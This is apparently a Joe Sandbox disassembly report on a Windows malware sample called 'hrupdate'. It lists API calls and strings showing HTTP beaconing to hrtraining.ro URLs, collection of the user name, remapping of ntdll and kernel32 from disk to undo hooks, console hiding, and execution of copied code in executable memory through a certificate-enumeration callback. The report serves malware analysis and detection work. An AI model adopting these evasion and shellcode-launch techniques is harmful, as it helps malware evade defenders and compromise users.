                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B025D1
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02628
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memcpy$inet_addrmemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsmemchrreallocsendsocketstrncpy
                                                                • String ID: $$GET %s HTTP/1.0$Host: %s$http://$https://
                                                                • API String ID: 241144766-2968714747
                                                                • Opcode ID: 1bff673d29df2f567242d15862eba1c75a0a6392bb2a835453657ef1e35d0b23
                                                                • Instruction ID: 9ae3fafadb9f900987a09bae04eb0fb17ed971618cb8e38fddd6177bb4b39ed5
                                                                • Opcode Fuzzy Hash: 1bff673d29df2f567242d15862eba1c75a0a6392bb2a835453657ef1e35d0b23
                                                                • Instruction Fuzzy Hash: CC52B071A001189FDB15DF68CC98BADBFB6EF55314F1442E8E509A72C1DB329E89CB60
                                                                Function 00B01480 Relevance: 54.5, APIs: 25, Strings: 6, Instructions: 269windowstringnetworkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • WSAStartup.WS2_32(00000101,?), ref: 00B014D0
                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00B014EE
                                                                • wcstombs_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000101,?,00000101), ref: 00B01513
                                                                • memset.VCRUNTIME140 ref: 00B0155E
                                                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000400), ref: 00B01579
                                                                  • Part of subcall function 00B02180: socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                  • Part of subcall function 00B02180: inet_addr.WS2_32(00000000), ref: 00B02273
                                                                  • Part of subcall function 00B02180: gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                  • Part of subcall function 00B02180: htons.WS2_32(00000050), ref: 00B022BB
                                                                  • Part of subcall function 00B02180: connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                • WSACleanup.WS2_32 ref: 00B015A7
                                                                • LoadStringW.USER32(?,00000067,SibcorUpdate,00000064), ref: 00B015BD
                                                                • LoadStringW.USER32(?,0000006D,SIBCORUPDATE,00000064), ref: 00B015C9
                                                                • LoadIconW.USER32(?,0000006B), ref: 00B0160C
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B0161B
                                                                • LoadIconW.USER32(?,0000006C), ref: 00B0164D
                                                                • RegisterClassExW.USER32(00000030), ref: 00B0165C
                                                                • CreateWindowExW.USER32(00000000,SIBCORUPDATE,SibcorUpdate,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00B0168E
                                                                • UpdateWindow.USER32(00000000), ref: 00B0169F
                                                                • LoadIconW.USER32(?,0000006B), ref: 00B016A8
                                                                • lstrcpyW.KERNEL32(?,HR Trainings), ref: 00B016F2
                                                                • Shell_NotifyIconW.SHELL32(00000000,000003BC), ref: 00B01701
                                                                • LoadAcceleratorsW.USER32(?,0000006D), ref: 00B0170A
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B01819
                                                                • DialogBoxParamW.USER32(?,00000067,?,00B01A20,00000000), ref: 00B01839
                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B01859
                                                                • TranslateMessage.USER32(?), ref: 00B0186A
                                                                • DispatchMessageW.USER32(?), ref: 00B01877
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B0188A
                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B018A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Load$IconMessage$StringTranslateWindow$AcceleratorAcceleratorsClassCleanupCreateCursorDialogDispatchNameNotifyParamRegisterShell_StartupUpdateUserconnectgethostbynamehtonsinet_addrlstrcpymemsetsocketstrncatterminatewcstombs_s
                                                                • String ID: @qv$HR Trainings$SIBCORUPDATE$SibcorUpdate$http://www.hrtraining.ro/trakingu/$slv
                                                                • API String ID: 821071236-801964392
                                                                • Opcode ID: b083f8d62007d88ae7714f99ed62ea6e58347ecd31209255204e3746800bfbe6
                                                                • Instruction ID: 4b583c298d7aa92c601f90eae20904b678de3e5909418f225bb64626bbbce684
                                                                • Opcode Fuzzy Hash: b083f8d62007d88ae7714f99ed62ea6e58347ecd31209255204e3746800bfbe6
                                                                • Instruction Fuzzy Hash: 5BC14AB1D4031D9BDB208F54DC49BEABBB8EB14705F0041D9E609A72D0EBB56B94CF91
                                                                Function 04FD4173 Relevance: 6.0, APIs: 4, Instructions: 44encryptionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 786 4fd4173-4fd419a CryptAcquireContextA 787 4fd419c-4fd41ad CryptAcquireContextA 786->787 788 4fd41b3-4fd41c6 CryptGenRandom 786->788 787->788 789 4fd41af-4fd41b2 787->789 790 4fd41c8-4fd41d5 CryptReleaseContext 788->790 791 4fd41d7-4fd41d9 788->791 790->789 791->790
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,04FF8490,00000001,F0000020,00000080,00000000,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD4196
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,04FF8490,00000001,F0000028,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD41A9
                                                                • CryptGenRandom.ADVAPI32(00000000,04FCBE33,?,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD41BD
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD41CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$Acquire$RandomRelease
                                                                • String ID:
                                                                • API String ID: 685801729-0
                                                                • Opcode ID: e41b14b3f58796d468a5004a3fd078f86d6e2c302e3a3753ab5fd9f70f0c400d
                                                                • Instruction ID: d3a5fce6e6ab0cfcae319fecc83cf3f246ff188af8941330775f8a31f1194d8c
                                                                • Opcode Fuzzy Hash: e41b14b3f58796d468a5004a3fd078f86d6e2c302e3a3753ab5fd9f70f0c400d
                                                                • Instruction Fuzzy Hash: 7DF0AF36E41228FBDF218A91DD09F8E7B6DDF49B64F100011FE00B2040D7B0EA019BA4
                                                                Function 04FDD81B Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f15bf9834b2d04e925b24a2663e6d41f2882dfa1a279f5640d2de6c245aac20d
                                                                • Instruction ID: 0e6672bd4912d781e6c354683cb95ba96bc9248861012f27e8461038d6080740
                                                                • Opcode Fuzzy Hash: f15bf9834b2d04e925b24a2663e6d41f2882dfa1a279f5640d2de6c245aac20d
                                                                • Instruction Fuzzy Hash: 2AD0123264910D9EEB11EE18FD415BDB3A3E740A95F840AD9EA01025447A2B7C275691
                                                                Function 00B02180 Relevance: 42.3, APIs: 20, Strings: 4, Instructions: 344networkstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 222 b02180-b0226a call b01ca0 socket 225 b022e4-b022e6 222->225 226 b0226c-b02279 inet_addr 222->226 227 b022ec-b02317 call b01050 225->227 228 b02283-b02296 inet_addr gethostbyaddr 226->228 229 b0227b-b02281 gethostbyname 226->229 235 b02320-b02333 227->235 231 b0229c-b0229e 228->231 229->231 233 b022a0-b022da htons connect 231->233 234 b022dc-b022e1 231->234 233->227 233->234 234->225 235->235 236 b02335-b0233c 235->236 237 b02340-b02348 236->237 237->237 238 b0234a-b0238c call b01050 237->238 241 b02390-b02395 238->241 241->241 242 b02397-b0239f 241->242 243 b023a0-b023a6 242->243 243->243 244 b023a8-b023bd 243->244 245 b023c0-b023c8 244->245 245->245 246 b023ca-b023e3 245->246 247 b023e4-b023ec 246->247 247->247 248 b023ee-b023fd 247->248 249 b02400-b02405 248->249 249->249 250 b02407-b0244f send memset recv 249->250 251 b02451-b024b6 realloc memcpy memset recv 250->251 252 b024b8-b024d2 strstr 250->252 251->251 251->252 253 b024d4-b024e5 strstr 252->253 254 b024e7-b024eb 252->254 253->254 255 b024ee-b02572 call b02e0d memcpy call b02e0d strncpy call b02dff closesocket 253->255 254->255 262 b02574-b02583 255->262 263 b025a5-b025ae 255->263 264 b02585-b02593 262->264 265 b0259b-b025a2 call b02dff 262->265 266 b025b0-b025bf 263->266 267 b025e1-b02605 263->267 264->265 268 b02595 _invalid_parameter_noinfo_noreturn 264->268 265->263 270 b025c1-b025cf 266->270 271 b025d7-b025de call b02dff 266->271 272 b02607-b02616 267->272 273 b02638-b02659 call b02dbe 267->273 268->265 270->271 276 b025d1 _invalid_parameter_noinfo_noreturn 270->276 271->267 278 b02618-b02626 272->278 279 b0262e-b02635 call b02dff 272->279 276->271 278->279 280 b02628 _invalid_parameter_noinfo_noreturn 278->280 279->273 280->279
                                                                APIs
                                                                  • Part of subcall function 00B01CA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01DC4
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                • inet_addr.WS2_32(00000000), ref: 00B02273
                                                                • gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                • inet_addr.WS2_32(00000000), ref: 00B02283
                                                                • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00B02296
                                                                • htons.WS2_32(00000050), ref: 00B022BB
                                                                • connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 00B02414
                                                                • memset.VCRUNTIME140 ref: 00B02429
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B02445
                                                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00B02465
                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 00B0247D
                                                                • memset.VCRUNTIME140 ref: 00B02495
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B024AC
                                                                • strstr.VCRUNTIME140 ref: 00B024C7
                                                                • strstr.VCRUNTIME140 ref: 00B024DA
                                                                • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00B02508
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00B02530
                                                                • closesocket.WS2_32(?), ref: 00B02563
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02595
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B025D1
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02628
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$inet_addrmemcpymemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsreallocsendsocketstrncpy
                                                                • String ID: $$GET %s HTTP/1.0$Host: %s
                                                                • API String ID: 1879041676-1199678302
                                                                • Opcode ID: 237bf1f4030e2f9892e4d0222378a17ba824e6d40bef8d4ad545d724f3e75d59
                                                                • Instruction ID: 55a47e74199f3875b478589be89616e1ac32844896622a9e71a60bb70ee1e69a
                                                                • Opcode Fuzzy Hash: 237bf1f4030e2f9892e4d0222378a17ba824e6d40bef8d4ad545d724f3e75d59
                                                                • Instruction Fuzzy Hash: C7D1E4719002189FDB24CF64DC49BDDBBB6EFA5304F0442E8E509A7291DB329E99CF64
                                                                Function 00B010A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 175COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00B02DCF: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B027F7,00000000,00000000,?,?,?,00000000), ref: 00B02DE4
                                                                • _Cnd_init.MSVCP140(?,00000000), ref: 00B0110F
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01123
                                                                • _Mtx_init.MSVCP140(?,00000001), ref: 00B01144
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01152
                                                                • _Mtx_lock.MSVCP140(?), ref: 00B01172
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01180
                                                                • _Thrd_start.MSVCP140(?,Function_00001090,00B04424), ref: 00B011AA
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000001), ref: 00B011C3
                                                                • _Cnd_wait.MSVCP140(?,?), ref: 00B011D6
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B011E4
                                                                • _Mtx_unlock.MSVCP140(?), ref: 00B01212
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01220
                                                                • _Mtx_destroy.MSVCP140(?), ref: 00B01228
                                                                • _Cnd_destroy.MSVCP140(?), ref: 00B01234
                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B0124A
                                                                • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 00B01270
                                                                • _Thrd_detach.MSVCP140(?,?), ref: 00B0127F
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B0128D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Throw_$C_error@std@@$Cnd_destroyCnd_initCnd_waitCpp_error@std@@Mtx_destroyMtx_initMtx_lockMtx_unlockThrd_detachThrd_startmallocterminate
                                                                • String ID: @qv
                                                                • API String ID: 3376608752-332092656
                                                                • Opcode ID: ffa068ade5f07a5d49ad655867aa7194601478a0ad5f424701a42334c0fe8a43
                                                                • Instruction ID: 9bbdcb817f76c4f0ead8987afa7d79f7c12b0e6773647265827dc9383b9f19fb
                                                                • Opcode Fuzzy Hash: ffa068ade5f07a5d49ad655867aa7194601478a0ad5f424701a42334c0fe8a43
                                                                • Instruction Fuzzy Hash: 20615FB0D00248ABDF14DBA8DD497DEBFF4EF14304F144169E905B3291EB75AA58CBA1
                                                                Function 00B02BC0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 102memorynetworkencryptionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00B01B30: GetCurrentProcess.KERNEL32 ref: 00B01B47
                                                                  • Part of subcall function 00B01B30: GetModuleHandleA.KERNEL32 ref: 00B01B62
                                                                  • Part of subcall function 00B01B30: K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00B01B73
                                                                  • Part of subcall function 00B01B30: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01B8F
                                                                  • Part of subcall function 00B01B30: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BA6
                                                                  • Part of subcall function 00B01B30: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BB8
                                                                  • Part of subcall function 00B01B30: VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C2C
                                                                  • Part of subcall function 00B01B30: memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C43
                                                                  • Part of subcall function 00B01B30: VirtualProtect.KERNEL32(?,?,?,?), ref: 00B01C5C
                                                                  • Part of subcall function 00B01B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C76
                                                                  • Part of subcall function 00B01B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C7B
                                                                  • Part of subcall function 00B01B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C80
                                                                  • Part of subcall function 00B01B30: FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C85
                                                                • GetConsoleWindow.KERNEL32(00000000), ref: 00B02CCA
                                                                • ShowWindow.USER32(00000000), ref: 00B02CD1
                                                                • WSAStartup.WS2_32 ref: 00B02D32
                                                                  • Part of subcall function 00B02180: socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                  • Part of subcall function 00B02180: inet_addr.WS2_32(00000000), ref: 00B02273
                                                                  • Part of subcall function 00B02180: gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                  • Part of subcall function 00B02180: htons.WS2_32(00000050), ref: 00B022BB
                                                                  • Part of subcall function 00B02180: connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B02D60
                                                                • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 00B02D6D
                                                                • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,?), ref: 00B02D83
                                                                • FlsAlloc.KERNEL32(?), ref: 00B02D8A
                                                                • FlsSetValue.KERNEL32(00000000,?), ref: 00B02D9E
                                                                • WSACleanup.WS2_32 ref: 00B02DA4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseFileVirtual$AllocCreateModuleProtectWindowmemcpy$CertCleanupConsoleCurrentEnumFreeInformationLibraryMappingProcessShowStartupStoreSystemValueViewconnectgethostbynamehtonsinet_addrsocket
                                                                • String ID: c:\windows\system32\kernel32.dll$c:\windows\system32\ntdll.dll$dummy$http://www.hrtraining.ro/trainingcheck_v5498$kernel32.dll$ntdll.dll
                                                                • API String ID: 3600704002-5958019
                                                                • Opcode ID: 156830dd0b07f45e2fa641555fc1113c466618b40116440836d94c7745065869
                                                                • Instruction ID: 8f0bacf5de34b16d423386d04b134c2a39cc47fbd91ebd638982829055d2c32a
                                                                • Opcode Fuzzy Hash: 156830dd0b07f45e2fa641555fc1113c466618b40116440836d94c7745065869
                                                                • Instruction Fuzzy Hash: F34152B08083C59AD331DB64DD097EABBF4FBB9304F00561DEA88631A2EF706184CB56
                                                                Function 00B01B30 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 131filememoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00B01B47
                                                                • GetModuleHandleA.KERNEL32 ref: 00B01B62
                                                                • K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00B01B73
                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01B8F
                                                                • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BA6
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BB8
                                                                • VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C2C
                                                                • memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C43
                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 00B01C5C
                                                                • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C76
                                                                • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C7B
                                                                • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C80
                                                                • FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseFile$CreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewmemcpy
                                                                • String ID: .text
                                                                • API String ID: 3896868005-2719751843
                                                                • Opcode ID: a3e610069ed1cc1327cd3e4481948e012175b35a853f895de0102b737033df99
                                                                • Instruction ID: 02ae1497ff20a1cedae57beebe4e73c52d710431ff8858cd4595b848cdda656b
                                                                • Opcode Fuzzy Hash: a3e610069ed1cc1327cd3e4481948e012175b35a853f895de0102b737033df99
                                                                • Instruction Fuzzy Hash: AE4190B2940204ABDB20CFA4DC85BAABFB9FF18700F104555F705B7291EB71A950CBA4
                                                                Function 00B012C0 Relevance: 18.2, APIs: 12, Instructions: 156COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • _Query_perf_frequency.MSVCP140 ref: 00B012F3
                                                                • _Query_perf_counter.MSVCP140 ref: 00B01305
                                                                • __alldvrm.LIBCMT ref: 00B01310
                                                                • _Query_perf_frequency.MSVCP140(?,00000000), ref: 00B01322
                                                                • _Query_perf_counter.MSVCP140(?,00000000), ref: 00B01330
                                                                • __alldvrm.LIBCMT ref: 00B01341
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B01399
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B013C0
                                                                • _Xtime_get_ticks.MSVCP140(00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000,00000000,?,?,00000000,?,00000000,3B9ACA00,00000000), ref: 00B013EA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0140C
                                                                • _Thrd_sleep.MSVCP140(00000000,00000000,?,3B9ACA00,00000000,00000000,?,00000064,00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000), ref: 00B01434
                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00B0146D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Query_perf_counterQuery_perf_frequency__alldvrm$Thrd_sleepXbad_function_call@std@@Xtime_get_ticks
                                                                • String ID:
                                                                • API String ID: 1496849827-0
                                                                • Opcode ID: 6ee9a781c565826a07d9645ae27b52d2387546c891c52cfccc2551e97db9c029
                                                                • Instruction ID: 12a4b3e533ab22d87d0439574b4dca5eb8ede43b53a2f4b17f575055be1929ee
                                                                • Opcode Fuzzy Hash: 6ee9a781c565826a07d9645ae27b52d2387546c891c52cfccc2551e97db9c029
                                                                • Instruction Fuzzy Hash: 48515CB2908340AFD710DF688C45B2BBFF9EFC8754F154A5DF689A72A1D73199008B92
                                                                Function 04FC609E Relevance: 16.7, APIs: 11, Instructions: 186networkfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC60DF
                                                                • __snprintf.LIBCMT ref: 04FC6106
                                                                  • Part of subcall function 04FCD3F2: _memset.LIBCMT ref: 04FCD413
                                                                • __snprintf.LIBCMT ref: 04FC6182
                                                                • __snprintf.LIBCMT ref: 04FC6199
                                                                • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,04FF656C,05009668), ref: 04FC61C8
